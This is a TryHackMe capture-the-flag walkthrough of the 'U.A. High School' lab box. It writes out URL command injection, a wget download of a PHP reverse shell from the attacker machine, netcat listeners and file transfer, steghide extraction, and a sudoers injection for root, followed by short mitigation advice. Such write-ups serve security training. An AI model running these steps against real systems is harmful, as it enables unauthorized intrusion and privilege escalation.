TryHackMe: U.A. High School Walkthrough

Use your ethical hacker powers to test the security of the Hero Academia U.A High School Website.

Stage One: Enumeration

The room description hints that we must find and exploit web application/website vulnerabilities; most likely, the website is hosted on the default HTTP port 80. However, we must be thorough and enumerate any different and additional ports: sudo nmap -T4 -p- --min-rate 1000 <target_ip>

I find two ports, 22 (SSH) and 80 (HTTP), and a more detailed enumeration yields no helpful information. Take note of port 22; we will use it later.

he U.A. High School website is simple and does not hide anything interesting; the source code points to an assets directory, which could mean more hidden web directories.

When I fire up GoBuster, I do not find any additional directories beyond the assets directory, but when I enumerate that, I see an index.php script file.

gobuster dir -u http://<target_ip>/assets -w /usr/share/wordlists/dirb/common.txt -x .txt,.html,.php -b403,404

Accessing the index.php file does not display anything; PHP command injection?

Accessing this web address, http://<target_ip>/assets/index.php?cmd=pwd, I get the following base64 encoded text: L3Zhci93d3cvaHRtbC9hc3NldHMK

I prefer using CyberChef to encode or decode such text, but if you like the command line, you can decode base64 using the following command: echo “base64_encoded_text“ | base64 -d

I decided to try and retrieve the Linux user file via http://<target_ip>/assets/index.php?cmd=cat%20/etc/paswd and confirm there is an interesting user/hero registered - deku. Based on previous THM boxes, I must elevate my initial access privileges to ‘deku’ and then to root.

TIP: you can try inspecting the index.php script using the following address - http://<target_ip>/assets/index.php?cmd=cat%20index.php. However, there is not much to exploit.

Time to get a reverse shell on the system; upload a PHP reverse shell script:

1. Download PentestMonkey PHP Reverse Script (PentestMonkey GitHub) and amend the required variables - IP and Port

2. Host the script on your attacker machine using the Python3 web server module - python3 -m http.server 8081

3. Access this address to upload/download the amended reserve PHP shell script on the U.A. High School target machine - http://<target_ip>/assets/index.php?cmd=wget%20http://<attacker_ip>:8081/rshell.php

4. Launch a Netcat listener based on the amended script variables - nc -nvlp 5445

5. Access the uploaded PHP reverse shell script - http://<target_ip>/assets/rshell.php

Stage Two: Exploit

I now have access to the machine as a low-level user - www-data, and perform the usual manual enumeration. I am looking for a way to elevate my privileges to ‘deku.’ I did try using linPEAS but did not find anything useful that can be used to elevate my privileges.

I opt to review the directories/files on the system and find two files within the assets/images folder; I can view the yuie.jpg file but not the oneforall.jpg image file and decide to download and analyze it. The files can be transferred via Netcat (target machine) nc <attacker_ip> <netcat_port> < oneforall.jpg and (attacker machine) nc -nvlp <netcat_port> > oneforall.jpg

I can’t open the file on my machine, and further analysis reveals that it is recognized as a data file rather than a typical image file despite the initial file characters indicating that it is an image file.

I spent some time on Google and found that I can use HexEdit to view and edit files in Hexadecimal or ASCII format. However, I needed to compare this to another working image file (right) to identify the ‘incorrect’ hexadecimal characters (left) of the oneforall.jpg file.

Assuming this was a real-world situation, the most probable reason the image file was unreadable was that someone tried to hide information in it and messed up the encoding. Using steghide extract -sf oneforall.jpg but I am requested for a passphrase to view the hidden message.

Returning to my low-level shell, I find a hidden directory /var/www/Hidden_Content containing a base64 encoded passphrase.

I can now access the hidden message and retrieve Deku’s credentials by decoding the passphrase.

When I tried the credentials on the SSH port I found earlier, I was able to get a higher-level shell on the target machine and the first user flag.

Stage Three: Privilege Escalation

I understand why this machine is rated easy: privilege escalation is pretty simple. Manual enumeration is all you need to find a quick and easy way via sudo -l which highlights an unusual file /opt/NewComponent/feedback.sh.

Deku is not a member of the sudoers club; we can use this script to change this and become the No. 1 hero. First, I need to change directories to the script’s folder, then execute the script using sudo, and finally, when I am requested for ‘feedback’ I can submit the following text - deku ALL=NOPASSWD: ALL » /etc/sudoers

Now, when I check Deku’s permission, I can run everything as root and launch a new bash terminal using sudo /bin/bash to get the root flag.

Mitigation Measures

I have not implemented or encountered public (or internal) servers that allow executing commands via a URL address. Regardless, this single flaw allows an attacker to gain low-level access to the machine. Once on the machine, it is only a matter of time before an attacker will find a way to elevate privileges.

Simple takeaway: DO NOT ALLOW command execution within web applications, regardless of whether this is via the URL address or internal application backend. I came across a similar issue when breaking into the VulnHub Butler machine that allowed command execution via the Jenkins Script Console (Walkthrough)

If it is absolutely required, secure it as best you can and regularly monitor its access and use.

Conclusion

Overall, the U.A. High School box was an exciting challenge, especially when finding unusual files and hidden messages.

References

Cover image: Generated with Microsoft Designer

Links to support articles and tools are included within the article.